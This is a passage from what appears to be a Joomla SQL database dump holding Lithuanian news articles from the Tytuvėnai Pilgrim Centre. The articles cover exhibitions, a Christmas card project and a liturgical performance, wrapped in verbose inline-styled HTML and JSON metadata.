13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">\"Pagavę įkvėpimą\"vienuolyno koridoriuje piešėme \"kitokį pasaulį\". Smagiai pristatėme savo paveikslus. Vakaro pabaigoje- \"O\' buolių\" nominacijos...</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">\"Menų vakaro fotografai - Šiaulių dailės mokyklos mokytojai ir mokiniai. </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VšĮ \"Tytuvėnų piligrimų centras\" kviečia į renginius, pobūvius, šventes senuosiuose vienuolyno rūmuose.</span></span></span></p>',1,0,0,44,'2016-12-13 05:12:23',135,'','2016-12-13 05:21:38',135,0,'0000-00-00 00:00:00','2016-12-13 05:12:23','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/menu_vakaras\\/main\\/menu_vakaras.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,103,'','',1,2757,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(277,366,'Eglės Bičkienės grafikos darbų paroda','egles-bickienes-grafikos-darbu-paroda','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų bernardinų vienuolyno bibliotekos salėje personalinė Eglės Bičkienės grafikos darbų paroda.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/egles_bickienes/020.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kūrybos darbus autorė perteikia skirtingomis grafinėmis priemonėmis - kolografijos, netikėtos žaismingos tekstūros, tonų ir pustonių įvairove. Eksponuojamuose kūriniuose - nėriniuose panirusios bažnyčios, raibuliuojantys \"Sidabriniai šešėliai\", ažūrinis \"Seno porceliano pasakojimas\". </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">KVIEČIAME APSILANKYTI. </span></span></span></p>',1,0,0,44,'2016-12-13 05:44:42',135,'','2016-12-13 05:47:38',135,0,'0000-00-00 00:00:00','2016-12-13 05:44:42','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/egles_bickienes\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,102,'','',1,2776,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(278,367,'Kalėdinis atvirukas','kaledinis-atvirukas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tradiciją pasveikinti savo artimus žmones ar padaryti jiems staigmeną, siunčiant sveikinimą  dar prisimena vyresnioji karta.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/kaledinis_atvirukas{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šį būdą iš naujo atranda ir jaunimas, kurių vis daugiau giminaičių ir draugų gyvena užsienio šalyse. Taip žmonės atsigręžia į tai, kas tikra. Juk rašydami atviruką, sveikinimą, dėdami jį į voką, parinkdami pašto ženklą kartu parodome, kad mes įdedame ir nemažai pastangų ir toks sveikinimas, palinkėjimas turi tikrai didesnę išliekamąją vertę.</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Tytuvėnų piligrimų centras per aštuonis metus nuo įstaigos įsikūrimo turi sukaupęs kad ir ne didelę kalėdinių atvirukų kolekciją, kurioje yra ir keli beveik prieš šimtmetį tytuvėniškių Kalėdų proga gauti atvirukai. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Tad šiemet ir Tytuvėnų kultūros centro šokėjams ir gimnazijos maironiečiams buvo pasiūlyta pagaminti savo rankomis sveikinimo atviruką vienišiems ir seniems miestelio žmonėms, kuriuos jaunimas tradiciškai aplanko prieš Kalėdų šventes. Tikimės kad vaikų rankomis pagaminti atvirukai pradžiugins senolius primins jiems jaunystės dienas kuomet patys savo artimiesiems tikrai yra išsiuntę ne vieną atviruką su nuoširdžiausiais sveikinimais. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">VšĮ “Tytuvėnų piligrimų centras”</span></p>',1,0,0,44,'2016-12-18 20:34:57',135,'','2016-12-18 20:35:21',135,0,'0000-00-00 00:00:00','2016-12-18 20:34:57','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kaledinis_atvirukas\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,101,'','',1,2953,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(279,368,'Fotografijų paroda','fotografiju-paroda','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">OLEGO ŠTELMANO fotografijų paroda - Biblijos takais.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Parodos autorius OLEGAS ŠTELMANAS - Šiaulių Šv. apaštalų Petro ir Povilo cerkvės kunigas - poetas, dainų autorius. 2016 m. apdovanotas literatūros premija, kurios steigėjas Rusijos rašytojų sąjunga ir Rusijos Imperijos Namai.</span></span></span></span></span></span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><img src=\"images/stories/naujienos/biblijos_takais/big.jpg\" border=\"0\" alt=\"\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></span></span></span></span></span></span></p>',1,0,0,44,'2017-01-12 07:23:27',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2017-01-12 07:23:27','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/biblijos_takais\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,100,'','',1,2886,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(280,369,'Liturginė istorija \"Paskutinė vakarienė\"','teatralizuota-liturgine-istorija-paskutine-vakariene','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kviečiame 2017 m. balandžio 2d. 15 val. dalyvauti teatralizuotoje liturginėje istorijoje \"Paskutinė vakarienė\".</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">1<img src=\"images/stories/naujienos/paskutine_vakariene/pv.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2017-03-28 07:27:58',135,'','2017-03-28 07:28:55',135,0,'0000-00-00 00:00:00','2017-03-28 07:27:58','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/paskutine_vakariene\\/paskutine_vakariene.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,99,'','',1,2678,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(284,373,'Camino Lituano','camino-lituano','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Camino Lituano. Švento Jokūbo kelias Lietuvoje.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; 